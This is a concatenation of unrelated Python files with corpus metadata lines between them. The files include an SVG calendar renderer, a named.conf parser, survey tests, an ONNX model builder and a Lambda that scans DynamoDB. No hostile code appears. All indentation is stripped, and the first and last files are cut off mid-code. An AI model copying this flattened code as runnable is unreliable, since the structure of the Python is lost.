# "style": f"""
# color: {color};
# font-size: {CalendarImage.FONT_SIZE_ANNOTATION}pt;
# """.strip(),
# "xmlns": "http://www.w3.org/1999/xhtml",
# },
# str("・".join(imdt.holiday.names)),
# ):
# pass
def __draw_imdt_syukuzitu(self, _e) -> None:
pass
def __draw_joubi(self, _e) -> None:
for i, (joubi, color) in enumerate(
[
("日", CalendarImage.RED),
("月", CalendarImage.BLACK),
("火", CalendarImage.BLACK),
("水", CalendarImage.BLACK),
("木", CalendarImage.BLACK),
("金", CalendarImage.BLACK),
("土", CalendarImage.BLUE),
]
):
x = (
CalendarImage.WIDTH_LEFT_SPACE
+ (CalendarImage.SIZE_DAY_SQUARE / 2)
- 2.0
+ CalendarImage.SIZE_DAY_SQUARE * i
)
self.__draw_text(
_e,
{
"fill": color,
"font-size": CalendarImage.FONT_SIZE_SMALL,
"x": f"{x}mm",
"y": CalendarImage.HEIGHT_TOP_SPACE - 5,
},
joubi,
)
def __draw_static_frame(self, _e) -> None:
days = ImperialYearMonth(self.imdt.year, self.imdt.month).days()
for i in range(4):
days_of_week = 6 if i == 3 and days == 27 else 7
y = (
CalendarImage.HEIGHT_TOP_SPACE
+ (
CalendarImage.SIZE_DAY_SQUARE
+ CalendarImage.HEIGHT_GRDT_BELT
+ CalendarImage.HEIGHT_DAYS_GAP
)
* i
)
with _e(
"rect",
{
"fill": CalendarImage.WHITE,
"height": f"{CalendarImage.SIZE_DAY_SQUARE + CalendarImage.HEIGHT_GRDT_BELT}mm",
"stroke-width": CalendarImage.STROKE_WIDTH_BOLD,
"stroke": CalendarImage.BLACK,
"width": f"{CalendarImage.SIZE_DAY_SQUARE * days_of_week}mm",
"x": f"{CalendarImage.WIDTH_LEFT_SPACE}mm",
"y": f"{y}mm",
},
):
pass
y1 = (
CalendarImage.HEIGHT_TOP_SPACE
+ CalendarImage.SIZE_DAY_SQUARE
+ (
CalendarImage.SIZE_DAY_SQUARE
+ CalendarImage.HEIGHT_GRDT_BELT
+ CalendarImage.HEIGHT_DAYS_GAP
)
* i
)
y2 = (
CalendarImage.HEIGHT_TOP_SPACE
+ CalendarImage.SIZE_DAY_SQUARE
+ (
CalendarImage.SIZE_DAY_SQUARE
+ CalendarImage.HEIGHT_GRDT_BELT
+ CalendarImage.HEIGHT_DAYS_GAP
)
* i
)
with _e(
"line",
{
"stroke-width": CalendarImage.STROKE_WIDTH_THIN,
"stroke": CalendarImage.BLACK,
"x1": f"{CalendarImage.WIDTH_LEFT_SPACE}mm",
"x2": f"{CalendarImage.WIDTH_LEFT_SPACE + CalendarImage.SIZE_DAY_SQUARE * days_of_week}mm",
"y1": f"{y1}mm",
"y2": f"{y2}mm",
},
):
pass
for j in range(days_of_week):
y1 = (
CalendarImage.HEIGHT_TOP_SPACE
+ (
CalendarImage.SIZE_DAY_SQUARE
+ CalendarImage.HEIGHT_GRDT_BELT
+ CalendarImage.HEIGHT_DAYS_GAP
)
* i
)
y2 = (
CalendarImage.HEIGHT_TOP_SPACE
+ CalendarImage.SIZE_DAY_SQUARE
+ (
CalendarImage.SIZE_DAY_SQUARE
+ CalendarImage.HEIGHT_GRDT_BELT
+ CalendarImage.HEIGHT_DAYS_GAP
)
* i
)
with _e(
"line",
{
"stroke-width": CalendarImage.STROKE_WIDTH_BOLD,
"stroke": CalendarImage.BLACK,
"x1": f"{CalendarImage.WIDTH_LEFT_SPACE + CalendarImage.SIZE_DAY_SQUARE * (j + 1)}mm",
"x2": f"{CalendarImage.WIDTH_LEFT_SPACE + CalendarImage.SIZE_DAY_SQUARE * (j + 1)}mm",
"y1": f"{y1}mm",
"y2": f"{y2}mm",
},
):
pass
def __draw_text(
self, _e, attrib: t.Dict[str, t.Union[str, float]], text: str
) -> None:
attrib["y"] = "{}mm".format(text_y(attrib["y"], attrib["font-size"]))
attrib["font-size"] = "{}pt".format(attrib["font-size"])
with _e("text", attrib, text):
pass
def __draw_title(self, _e) -> None:
self.__draw_text(
_e,
{
"fill": CalendarImage.BLACK,
"font-size": CalendarImage.FONT_SIZE_LARGE,
"x": "5mm",
"y": 9.5,
},
"帝國火星暦",
)
self.__draw_text(
_e,
{
"fill": CalendarImage.BLACK,
"font-size": CalendarImage.FONT_SIZE_LARGE,
"x": "11mm",
"y": 18.0,
},
f"{self.imdt.year}年",
)
with _e(
"svg",
{
"height": "44mm",
"style": """
background-color: transparent;
""".strip(),
"width": f"{CalendarImage.WIDTH_LEFT_SPACE - 8}mm",
"x": "0mm",
"y": "28mm",
},
) as _e2:
self.__draw_text(
_e2,
{
"fill": CalendarImage.BLACK,
"font-family": CalendarImage.FONT_FAMILY_BOLD,
"font-size": CalendarImage.FONT_SIZE_BOLD_LARGE,
"text-anchor": "middle",
"x": "64%",
"y": 0.0,
},
f"{self.imdt.month}月",
)
self.__draw_text(
_e,
{
"fill": CalendarImage.BLACK,
"font-size": CalendarImage.FONT_SIZE_LARGE,
"x": "9.5mm",
"y": 42.0,
},
f"({self.imdt.japanese_month_name}月)",
)
self.__draw_text(
_e,
{
"fill": CalendarImage.GRAY,
"font-size": CalendarImage.FONT_SIZE_ANNOTATION,
"x": f"{CalendarImage.WIDTH_LEFT_SPACE - 5.5}mm",
"y": 52.0,
},
"~",
)
with _e(
"svg",
{
"height": "8mm",
"style": """
background-color: transparent;
""".strip(),
"width": f"{CalendarImage.WIDTH_LEFT_SPACE - 8}mm",
"x": "2mm",
"y": "52mm",
},
) as _e2:
weekdays = ["月", "火", "水", "木", "金", "土", "日"]
grdt_start = imdt_to_grdt(self.imdt, self.grdt_timezone)
grdt_start_weekday = weekdays[grdt_start.weekday - 1]
grdt_end = imdt_to_grdt(self.__next_imdt_month(), self.grdt_timezone)
grdt_end_weekday = weekdays[grdt_end.weekday - 1]
self.__draw_text(
_e2,
{
"fill": CalendarImage.GRAY,
"font-size": CalendarImage.FONT_SIZE_ANNOTATION,
"text-anchor": "end",
"x": "100%",
"y": 0.0,
},
"{}/{}/{}({}){:02}:{:02}:{:02}".format(
grdt_start.year,
grdt_start.month,
grdt_start.day,
grdt_start_weekday,
grdt_start.hour,
grdt_start.minute,
grdt_start.second,
),
)
text = ""
if grdt_start.year != grdt_end.year:
text += f"{grdt_end.year}/"
text += "{}/{}({}){:02}:{:02}:{:02}".format(
grdt_end.month,
grdt_end.day,
grdt_end_weekday,
grdt_end.hour,
grdt_end.minute,
grdt_end.second,
)
self.__draw_text(
_e2,
{
"fill": CalendarImage.GRAY,
"font-size": CalendarImage.FONT_SIZE_ANNOTATION,
"text-anchor": "end",
"x": "100%",
"y": 4.0,
},
text,
)
def __next_imdt_month(self) -> ImperialDateTime:
next_month = ImperialYearMonth(self.imdt.year, self.imdt.month).next_month()
return ImperialDateTime(
next_month.year, next_month.month, 1, 0, 0, 0, self.imdt.timezone
)
| 3.1875 | 3 |
insights/parsers/named_conf.py | lhuett/insights-core | 121 | 12762200 | """
NamedConf parser - file ``/etc/named.conf``
===========================================
NamedConf parser the file named configuration file.
Named is a name server used by BIND.
"""
from insights.specs import Specs
from insights.core.plugins import parser
from insights.parsers import SkipException
from insights.parsers.named_checkconf import NamedCheckconf
@parser(Specs.named_conf)
class NamedConf(NamedCheckconf):
"""
Class for parsing the file ``/etc/named.conf```, We use class ``NamedCheckConf`` to parse most
of the named.conf configurations and class ``NamedConf`` to parse the `include` directives.
.. note::
Please refer to the super-class :py:class:`insights.parsers.named_checkconf:NamedCheckConf`
for more usage information.
Attributes:
includes (list): List of files in 'include' section.
Raises:
SkipException: When content is empty or cannot be parsed.
Examples:
>>> named_conf.includes
['/etc/crypto-policies/back-ends/bind.config']
"""
def parse_content(self, content):
includes = []
super(NamedConf, self).parse_content(content)
try:
for line in [l for l in content if l.strip().startswith('include ') and ';' in l]:
includes.append(line.split(';')[0].replace('"', '').split()[1])
except IndexError:
raise SkipException("Syntax error of include directive")
self.includes = includes
| 2.515625 | 3 |
pyeccodes/defs/grib1/0_eswi_table.py | ecmwf/pyeccodes | 7 | 12762201 | def load(h):
return ({'abbr': 'none', 'code': 0, 'title': 'not set'},
{'abbr': 96,
'code': 96,
'title': 'HIRLAM data',
'units': 'non-standard, deprecated'},
{'abbr': 98,
'code': 98,
'title': 'previously used to tag SMHI data that is ECMWF compliant',
'units': 'deprecated'})
| 1.992188 | 2 |
drawer.py | polatbilek/terrain-prediction | 1 | 12762202 | from readwrite import get_data
import pandas as pd
import matplotlib.pyplot as plt
from scipy.stats import gaussian_kde
import numpy as np
def scatter(path, name):
data = get_data(path)
pd_data = pd.DataFrame(data)
plt.title("column 0 " + name)
plt.plot(pd_data[0])
plt.show()
plt.title("column 1 " + name)
plt.plot(pd_data[1])
plt.show()
plt.title("column 2 " + name)
plt.plot(pd_data[2])
plt.show()
return pd_data
def boxplot(datas, names):
column0 = []
column1 = []
column2 = []
labels = []
for i in range(len(datas)):
column0.append(datas[i][0])
column1.append(datas[i][1])
column2.append(datas[i][2])
labels.append(names[i])
plt.title("Boxplot column 0")
plt.boxplot(column0, labels=labels)
plt.show()
plt.title("Boxplot column 1")
plt.boxplot(column1, labels=labels)
plt.show()
plt.title("Boxplot column 2")
plt.boxplot(column2, labels=labels)
plt.show()
def draw_gaussian(datas):
pdf_ticks = np.linspace(0, 10000, 100000, endpoint=False)
density = gaussian_kde(datas)
plt.plot(pdf_ticks, density(pdf_ticks), color='r')
plt.show()
| 2.875 | 3 |
lambda_func/get_card_func.py | Yunato/lambda-anki-manager | 0 | 12762203 | <gh_stars>0
import boto3
from boto3.session import Session
def lambda_handler(event, context):
region = "ap-northeast-1"
session = Session(
region_name=region
)
dynamodb = session.resource('dynamodb')
table_name = ''
table = dynamodb.Table(table_name)
primary_key = ''
scan_response = table.scan()
scan_response['Items'] = sorted(scan_response['Items'], key=lambda x:x[primary_key], reverse=True)
return scan_response
| 2.34375 | 2 |
eval/src/tests/tensor/onnx_wrapper/dynamic.py | Anlon-Burke/vespa | 4,054 | 12762204 | # Copyright Yahoo. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
import onnx
from onnx import helper, TensorProto
QUERY_TENSOR = helper.make_tensor_value_info('query_tensor', TensorProto.FLOAT, ['batch', 4])
ATTRIBUTE_TENSOR = helper.make_tensor_value_info('attribute_tensor', TensorProto.FLOAT, [4, 1])
BIAS_TENSOR = helper.make_tensor_value_info('bias_tensor', TensorProto.FLOAT, ['batch', -1])
OUTPUT = helper.make_tensor_value_info('output', TensorProto.FLOAT, ['batch', 1])
nodes = [
helper.make_node(
'MatMul',
['query_tensor', 'attribute_tensor'],
['matmul'],
),
helper.make_node(
'ReduceSum',
['bias_tensor'],
['reduce'],
axes=[1]
),
helper.make_node(
'Add',
['matmul', 'reduce'],
['output'],
),
]
graph_def = helper.make_graph(
nodes,
'dynamic_scoring',
[
QUERY_TENSOR,
ATTRIBUTE_TENSOR,
BIAS_TENSOR,
],
[OUTPUT],
)
model_def = helper.make_model(graph_def, producer_name='dynamic.py', opset_imports=[onnx.OperatorSetIdProto(version=12)])
onnx.save(model_def, 'dynamic.onnx')
| 1.796875 | 2 |
tests/unit/nemex/nemex/test_nemex.py | suamin/nemex | 2 | 12762205 | <reponame>suamin/nemex<gh_stars>1-10
import unittest
from nemex import Nemex, Pruner, Default
class TestNemex(unittest.TestCase):
def setUp(self) -> None:
# data
self.document = None
self.entities = None
self.q = Default.TOKEN_THRESH
self.sim = Default.SIMILARITY
self.t = Default.SIM_THRESH_CHAR
self.pruner = Default.PRUNER
self.nemex = None
return None
def setArgs(self, document, entities, q, sim, t, pruner):
self.document = document
self.entities = entities
self.q = q
self.sim = sim
self.t = t
self.pruner = pruner
self.nemex = Nemex(
list_or_file_entities=self.entities,
char=Default.CHAR,
q=self.q,
special_char=Default.SPECIAL_CHAR,
unique=Default.UNIQUE,
lower=Default.LOWER,
similarity=self.sim,
t=self.t,
pruner=self.pruner,
verify=Default.VERIFY
)
return
@staticmethod
def get_matches(output):
matches = []
for mdict in output['matches']:
matches.append(mdict['match'])
return matches
def example_data_1(self, pruner, t):
self.setArgs(
document="Lorem ipsum dolo sit amet.",
entities=['dolor'],
q=Default.TOKEN_THRESH,
sim=Default.SIMILARITY,
t=t,
pruner=pruner
)
expected = []
if t >= 0:
expected += ['dolor']
if t >= 1:
expected += ['dolo', 'olor', ' dolor', 'dolor ']
if t >= 2:
expected += ['dol', 'lor', 'olo', 'm dolor', 'dolor s', ' dolor ', ' dolo', 'olor ']
if t >= 3:
expected += ['do', 'or', 'ol', 'lo', 'lor ', ' dol', 'm dolo', 'olor s']
output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
computed = self.get_matches(output)
return set(expected), set(computed)
def example_data_2(self, pruner, t):
self.setArgs(
document="At vero eos et accusam et justo duo dolores et ea rebum.",
entities=['gusta'],
q=Default.TOKEN_THRESH,
sim=Default.SIMILARITY,
t=t,
pruner=pruner
)
expected = []
if t >= 0:
expected += []
if t >= 1:
expected += []
if t >= 2:
expected += ['ust', 'just', 'usto', 'cusa', 'usa', 'justo']
if t >= 3:
expected += ['sto', ' just', 'usto ']
output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
computed = self.get_matches(output)
return set(expected), set(computed)
def example_data_3(self, pruner, t):
self.setArgs(
document="How much wood would a woodchuck chuck if a woodchuck could chuck wood?",
entities=['wood', 'chuck'],
q=Default.TOKEN_THRESH,
sim=Default.SIMILARITY,
t=t,
pruner=pruner
)
# TODO
expected = []
if t >= 0:
expected += []
if t >= 1:
expected += []
if t >= 2:
expected += []
if t >= 3:
expected += []
output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
computed = self.get_matches(output)
return set(expected), set(computed)
def example_data_4(self, pruner, t):
self.setArgs(
document="She sells seashells by the seashore.",
entities=['sea', 'shells'],
q=Default.TOKEN_THRESH,
sim=Default.SIMILARITY,
t=t,
pruner=pruner
)
# TODO
expected = []
if t >= 0:
expected += []
if t >= 1:
expected += []
if t >= 2:
expected += []
if t >= 3:
expected += []
output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
computed = self.get_matches(output)
return set(expected), set(computed)
def example_data_5(self, pruner, t):
self.setArgs(
document="<NAME> bought some butter, but she said the butter’s bitter.",
entities=['bitter', 'butter'],
q=Default.TOKEN_THRESH,
sim=Default.SIMILARITY,
t=t,
pruner=pruner
)
# TODO
expected = []
if t >= 0:
expected += []
if t >= 1:
expected += []
if t >= 2:
expected += []
if t >= 3:
expected += []
output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
computed = self.get_matches(output)
return set(expected), set(computed)
def example_data_6(self, pruner, t):
self.setArgs(
document="A big bug bit the little beetle but the little beetle bit the bug back.",
entities=['bug', 'beetle'],
q=Default.TOKEN_THRESH,
sim=Default.SIMILARITY,
t=t,
pruner=pruner
)
# TODO
expected = []
if t >= 0:
expected += []
if t >= 1:
expected += []
if t >= 2:
expected += []
if t >= 3:
expected += []
output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
computed = self.get_matches(output)
return set(expected), set(computed)
def example_data_7(self, pruner, t):
self.setArgs(
document="Ed Nott was shot and Sam Shott was not. So it is better to be Shott than Nott. "
"Some say Nott was not shot. But Shott says he shot Nott. Either the shot Shott shot "
"at Nott was not shot, or Nott was shot. If the shot Shott shot shot Nott, Nott was shot. "
"But if the shot Shott shot shot Shott, the shot was Shott, not Nott. However, the shot "
"Shott shot shot not Shott – but Nott. So, Ed Nott was shot and that’s hot! Is it not?",
entities=['not', 'shot'],
q=Default.TOKEN_THRESH,
sim=Default.SIMILARITY,
t=t,
pruner=pruner
)
# TODO
expected = []
if t >= 0:
expected += []
if t >= 1:
expected += []
if t >= 2:
expected += []
if t >= 3:
expected += []
output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
computed = self.get_matches(output)
return set(expected), set(computed)
def example_data_8(self, pruner, t):
self.setArgs(
document="<NAME> picked a peck of pickled peppers. A peck of pickled peppers <NAME> picked. "
"If <NAME> picked a peck of pickled peppers, Where’s the peck of pickled peppers <NAME> "
"picked?",
entities=['pickled', 'peppers'],
q=Default.TOKEN_THRESH,
sim=Default.SIMILARITY,
t=t,
pruner=pruner
)
# TODO
expected = []
if t >= 0:
expected += []
if t >= 1:
expected += []
if t >= 2:
expected += []
if t >= 3:
expected += []
output = self.nemex(document=self.document, valid_only=Default.VALID_ONLY)
computed = self.get_matches(output)
return set(expected), set(computed)
''' Data 1 '''
def test_nemex_bucket_t1_data_1(self):
expected, computed = self.example_data_1(Pruner.BUCKET_COUNT, 1)
self.assertEqual(expected, computed)
return
def test_nemex_bucket_t2_data_1(self):
expected, computed = self.example_data_1(Pruner.BUCKET_COUNT, 2)
self.assertEqual(expected, computed)
return
def test_nemex_bucket_t3_data_1(self):
expected, computed = self.example_data_1(Pruner.BUCKET_COUNT, 3)
self.assertEqual(expected, computed)
return
''' Data 2 '''
def test_nemex_bucket_t1_data_2(self):
expected, computed = self.example_data_2(Pruner.BUCKET_COUNT, 1)
self.assertEqual(expected, computed)
return
def test_nemex_bucket_t2_data_2(self):
expected, computed = self.example_data_2(Pruner.BUCKET_COUNT, 2)
self.assertEqual(expected, computed)
return
def test_nemex_bucket_t3_data_2(self):
expected, computed = self.example_data_2(Pruner.BUCKET_COUNT, 3)
self.assertEqual(expected, computed)
return
def tearDown(self) -> None:
return None
# TODO: data 3-8
''' Data 3 '''
''' Data 4 '''
''' Data 5 '''
''' Data 6 '''
''' Data 7 '''
''' Data 8 '''
if __name__ == '__main__':
unittest.main()
| 2.5625 | 3 |
python3/demo.extend/my_demo.py | cdluminate/MyNotes | 0 | 12762206 | <reponame>cdluminate/MyNotes
import my
status1 = my.hello()
status2 = my.echo('Hi my module!')
| 1.375 | 1 |
xidplus/HPC.py | MCarmenCampos/XID_plus | 3 | 12762207 | <filename>xidplus/HPC.py
import sys
import os
import numpy as np
from xidplus import moc_routines
from builtins import input
import pickle
import xidplus
def hierarchical_tile(masterfile,tilefile):
"""
Create Hierarchical tile from Master prior
:param masterfile: Master prior file
:param tilefile: File containing Tiling scheme
"""
try:
taskid = np.int(os.environ['SGE_TASK_ID'])
task_first=np.int(os.environ['SGE_TASK_FIRST'])
task_last=np.int(os.environ['SGE_TASK_LAST'])
except KeyError:
print("Error: could not read SGE_TASK_ID from environment")
taskid = int(input("Please enter task id: "))
print("you entered", taskid)
with open(tilefile, 'rb') as f:
obj = pickle.load(f)
tiles = obj['tiles']
order = obj['order']
tiles_large = obj['tiles_large']
order_large = obj['order_large']
obj=xidplus.io.pickle_load(masterfile)
priors = obj['priors']
moc = moc_routines.get_fitting_region(order_large, tiles_large[taskid - 1])
for p in priors:
p.moc = moc
p.cut_down_prior()
outfile = 'Tile_'+ str(tiles_large[taskid - 1]) + '_' + str(order_large) + '.pkl'
with open(outfile, 'wb') as f:
pickle.dump({'priors':priors, 'version':xidplus.io.git_version()}, f) | 2.296875 | 2 |
chapter5/handedclock.py | chavo1/playground-python | 0 | 12762208 | import time
current_time = time.localtime()
hour = current_time.tm_hour
print('The hour is', hour)
| 3.375 | 3 |
tests/integration/census/test_census_individual_submission_data.py | ONSdigital/census-survey-runner | 0 | 12762209 | from tests.integration.integration_test_case import IntegrationTestCase
class TestCensusIndividualSubmissionData(IntegrationTestCase):
def test_census_individual_data_matches_census_individual(self):
self.complete_survey('census', 'individual')
# Only verifying 'data'
actual_downstream_data = self.dumpSubmission()['submission']['data']
expected_downstream_data = self.get_expected_submission_data()
self.assertCountEqual(actual_downstream_data, expected_downstream_data)
@staticmethod
def get_expected_submission_data():
expected_downstream_data = [
{
'group_instance': 0,
'value': 'Danny',
'answer_instance': 0,
'answer_id': 'first-name'
},
{
'group_instance': 0,
'value': 'K',
'answer_instance': 0,
'answer_id': 'middle-names'
},
{
'group_instance': 0,
'value': 'Boje',
'answer_instance': 0,
'answer_id': 'last-name'
},
{
'group_instance': 0,
'value': 'Male',
'answer_instance': 0,
'answer_id': 'sex-answer'
},
{
'group_instance': 0,
'value': '1988-05-12',
'answer_instance': 0,
'answer_id': 'date-of-birth-answer'
},
{
'group_instance': 0,
'value': 'In a registered same-sex civil partnership',
'answer_instance': 0,
'answer_id': 'marital-status-answer'
},
{
'group_instance': 0,
'value': 'Yes, an address within the UK',
'answer_instance': 0,
'answer_id': 'another-address-answer'
},
{
'group_instance': 0,
'value': '',
'answer_instance': 0,
'answer_id': 'another-address-answer-other'
},
{
'group_instance': 0,
'value': 'Newport',
'answer_instance': 0,
'answer_id': 'other-address-answer-city'
},
{
'group_instance': 0,
'value': '',
'answer_instance': 0,
'answer_id': 'other-address-answer-street'
},
{
'group_instance': 0,
'value': '',
'answer_instance': 0,
'answer_id': 'other-address-answer-county'
},
{
'group_instance': 0,
'value': '12',
'answer_instance': 0,
'answer_id': 'other-address-answer-building'
},
{
'group_instance': 0,
'value': 'NP10 8XG',
'answer_instance': 0,
'answer_id': 'other-address-answer-postcode'
},
{
'group_instance': 0,
'value': 'Friends Home',
'answer_instance': 0,
'answer_id': 'address-type-answer-other'
},
{
'group_instance': 0,
'value': 'Other',
'answer_instance': 0,
'answer_id': 'address-type-answer'
},
{
'group_instance': 0,
'value': 'Yes',
'answer_instance': 0,
'answer_id': 'in-education-answer'
},
{
'group_instance': 0,
'value': 'here, at this address',
'answer_instance': 0,
'answer_id': 'term-time-location-answer'
},
{
'group_instance': 0,
'value': '',
'answer_instance': 0,
'answer_id': 'country-of-birth-wales-answer-other'
},
{
'group_instance': 0,
'value': 'England',
'answer_instance': 0,
'answer_id': 'country-of-birth-england-answer'
},
{
'group_instance': 0,
'value': '',
'answer_instance': 0,
'answer_id': 'country-of-birth-england-answer-other'
},
{
'group_instance': 0,
'value': 'Yes, 1 -19 hours a week',
'answer_instance': 0,
'answer_id': 'carer-answer'
},
{
'group_instance': 0,
'value': 'Ind',
'answer_instance': 0,
'answer_id': 'national-identity-england-answer-other'
},
{
'group_instance': 0,
'value': '',
'answer_instance': 0,
'answer_id': 'national-identity-wales-answer-other'
},
{
'group_instance': 0,
'value': [
'English',
'Welsh',
'Scottish',
'Northern Irish',
'British',
'Other'
],
'answer_instance': 0,
'answer_id': 'national-identity-england-answer'
},
{
'group_instance': 0,
'value': [],
'answer_instance': 0,
'answer_id': 'national-identity-wales-answer'
},
{
'group_instance': 0,
'value': 'Other ethnic group',
'answer_instance': 0,
'answer_id': 'ethnic-group-england-answer'
},
{
'group_instance': 0,
'value': 'Other',
'answer_instance': 0,
'answer_id': 'other-ethnic-group-answer'
},
{
'group_instance': 0,
'value': 'Telugu',
'answer_instance': 0,
'answer_id': 'other-ethnic-group-answer-other'
},
{
'group_instance': 0,
'value': '',
'answer_instance': 0,
'answer_id': 'language-welsh-answer-other'
},
{
'group_instance': 0,
'value': 'English',
'answer_instance': 0,
'answer_id': 'language-england-answer'
},
{
'group_instance': 0,
'value': '',
'answer_instance': 0,
'answer_id': 'language-england-answer-other'
},
{
'group_instance': 0,
'value': [],
'answer_instance': 0,
'answer_id': 'religion-welsh-answer'
},
{
'group_instance': 0,
'value': [
'No religion',
'Christian (Including Church of England, Catholic, Protestant and all other Christian denominations)',
'Buddhist',
'Hindu',
'Jewish',
'Muslim',
'Sikh',
'Other'
],
'answer_instance': 0,
'answer_id': 'religion-answer'
},
{
'group_instance': 0,
'value': '',
'answer_instance': 0,
'answer_id': 'religion-welsh-answer-other'
},
{
'group_instance': 0,
'value': 'Ind',
'answer_instance': 0,
'answer_id': 'religion-answer-other'
},
{
'group_instance': 0,
'value': 'This address',
'answer_instance': 0,
'answer_id': 'past-usual-address-answer'
},
{
'group_instance': 0,
'value': '',
'answer_instance': 0,
'answer_id': 'past-usual-address-answer-other'
},
{
'group_instance': 0,
'value': [
'United Kingdom'
],
'answer_instance': 0,
'answer_id': 'passports-answer'
},
{
'group_instance': 0,
'value': 'Yes, limited a lot',
'answer_instance': 0,
'answer_id': 'disability-answer'
},
{
'group_instance': 0,
'value': [
'Masters Degree',
'Postgraduate Certificate / Diploma'
],
'answer_instance': 0,
'answer_id': 'qualifications-england-answer'
},
{
'group_instance': 0,
'value': [],
'answer_instance': 0,
'answer_id': 'qualifications-welsh-answer'
},
{
'group_instance': 0,
'value': 'No',
'answer_instance': 0,
'answer_id': 'volunteering-answer'
},
{
'group_instance': 0,
'value': [
'none of the above?'
],
'answer_instance': 0,
'answer_id': 'employment-type-answer'
},
{
'group_instance': 0,
'value': 'Yes',
'answer_instance': 0,
'answer_id': 'jobseeker-answer'
},
{
'group_instance': 0,
'value': 'Yes',
'answer_instance': 0,
'answer_id': 'job-availability-answer'
},
{
'group_instance': 0,
'value': 'Yes',
'answer_instance': 0,
'answer_id': 'job-pending-answer'
},
{
'group_instance': 0,
'value': [
'a student?',
'long-term sick or disabled?'
],
'answer_instance': 0,
'answer_id': 'occupation-answer'
},
{
'group_instance': 0,
'value': 'Yes',
'answer_instance': 0,
'answer_id': 'ever-worked-answer'
},
{
'group_instance': 0,
'value': 'an employee?',
'answer_instance': 0,
'answer_id': 'main-job-answer'
},
{
'group_instance': 0,
'value': 'Software Engineer',
'answer_instance': 0,
'answer_id': 'job-title-answer'
},
{
'group_instance': 0,
'value': 'Development',
'answer_instance': 0,
'answer_id': 'job-description-answer'
},
{
'group_instance': 0,
'value': '31 - 48',
'answer_instance': 0,
'answer_id': 'hours-worked-answer'
},
{
'group_instance': 0,
'value': 'Train',
'answer_instance': 0,
'answer_id': 'work-travel-answer'
},
{
'group_instance': 0,
'value': 'Civil Servant',
'answer_instance': 0,
'answer_id': 'employers-business-answer'
},
{
'group_instance': 0,
'value': 'Employed by an organisation or business',
'answer_instance': 0,
'answer_id': 'main-job-type-answer'
},
{
'group_instance': 0,
'value': 'ONS',
'answer_instance': 0,
'answer_id': 'business-name-answer'
}
]
return expected_downstream_data
def complete_survey(self, eq_id, form_type_id):
self.launchSurvey(eq_id, form_type_id, region_code='GB-ENG', sexual_identity=False, roles=['dumper'])
# We are in the questionnaire
self.assertInPage('What is your name?')
self.assertInPage('>Save and continue<')
post_data = [
{
'first-name': 'Danny',
'middle-names': 'K',
'last-name': 'Boje'
},
{
'sex-answer': ['Male']
},
{
'date-of-birth-answer-day': '12',
'date-of-birth-answer-month': '5',
'date-of-birth-answer-year': '1988',
},
{
'marital-status-answer': ['In a registered same-sex civil partnership']
},
{
'another-address-answer': ['Yes, an address within the UK']
},
{
'other-address-answer-building': '12',
'other-address-answer-city': 'Newport',
'other-address-answer-postcode': 'NP10 8XG'
},
{
'address-type-answer': ['Other'],
'address-type-answer-other': 'Friends Home'
},
{
'in-education-answer': ['Yes']
},
{
'term-time-location-answer': ['here, at this address']
},
{
'country-of-birth-england-answer': ['England']
},
{
'carer-answer': ['Yes, 1 -19 hours a week']
},
{
'national-identity-england-answer': ['English',
'Welsh',
'Scottish',
'Northern Irish',
'British',
'Other'],
'national-identity-england-answer-other': 'Ind'
},
{
'ethnic-group-england-answer': ['Other ethnic group']
},
{
'other-ethnic-group-answer': ['Other'],
'other-ethnic-group-answer-other': 'Telugu'
},
{
'language-england-answer': ['English']
},
{
'religion-answer': ['No religion',
'Christian (Including Church of England, Catholic, Protestant and all other Christian denominations)',
'Buddhist',
'Hindu',
'Jewish',
'Muslim',
'Sikh',
'Other'],
'religion-answer-other': 'Ind'
},
{
'past-usual-address-answer': ['This address']
},
{
'passports-answer': ['United Kingdom']
},
{
'disability-answer': ['Yes, limited a lot']
},
{
'qualifications-england-answer': ['Masters Degree',
'Postgraduate Certificate / Diploma']
},
{
'volunteering-answer': ['No']
},
{
'employment-type-answer': ['none of the above?']
},
{
'jobseeker-answer': ['Yes']
},
{
'job-availability-answer': ['Yes']
},
{
'job-pending-answer': ['Yes']
},
{
'occupation-answer': ['a student?',
'long-term sick or disabled?']
},
{
'ever-worked-answer': ['Yes']
},
{
'main-job-answer': ['an employee?']
},
{
'job-title-answer': 'Software Engineer'
},
{
'job-description-answer': 'Development'
},
{
'hours-worked-answer': ['31 - 48']
},
{
'work-travel-answer': ['Train']
},
{
'employers-business-answer': 'Civil Servant'
},
{
'main-job-type-answer': ['Employed by an organisation or business']
},
{
'business-name-answer': 'ONS'
}
]
for post in post_data:
self.post(post_data=post)
# There are no validation errors (we're on the summary screen)
self.assertInPage('You’re ready to submit your 2017 Census Test')
| 2.5625 | 3 |
src/monitoring_service/constants.py | hackaugusto/raiden-services | 0 | 12762210 | from datetime import timedelta
DEFAULT_REQUIRED_CONFIRMATIONS: int = 10
MAX_FILTER_INTERVAL: int = 100_000
DEFAULT_GAS_BUFFER_FACTOR: int = 10
DEFAULT_GAS_CHECK_BLOCKS: int = 100
KEEP_MRS_WITHOUT_CHANNEL: timedelta = timedelta(minutes=15)
# A LockedTransfer message is roughly 1kb. Having 1000/min = 17/sec will be
# hard to achieve outside of benchmarks for now. To have some safety margin for
# bursts of messages, this is only enforced as an average over 5 minutes.
MATRIX_RATE_LIMIT_ALLOWED_BYTES = 5_000_000
MATRIX_RATE_LIMIT_RESET_INTERVAL = timedelta(minutes=5)
# Number of blocks after the close, during which MRs are still being accepted
CHANNEL_CLOSE_MARGIN: int = 10
| 1.742188 | 2 |
pipeline/schemas/validators.py | mystic-ai/pipeline | 7 | 12762211 | import re
# TO-DO: refactor validators as below
# https://pydantic-docs.helpmanual.io/usage/validators/
# Email regex mostly following RFC2822 specification. Covers ~99% of emails in use today
# Allows groups of alphanumerics and some special characters separated by dots,
# followed by a @,
# followed by groups of alphanumerics and non-staring/non-ending dashes,
# separated by dots.
EMAIL_REGEX = re.compile(
r"[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*"
r"@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)"
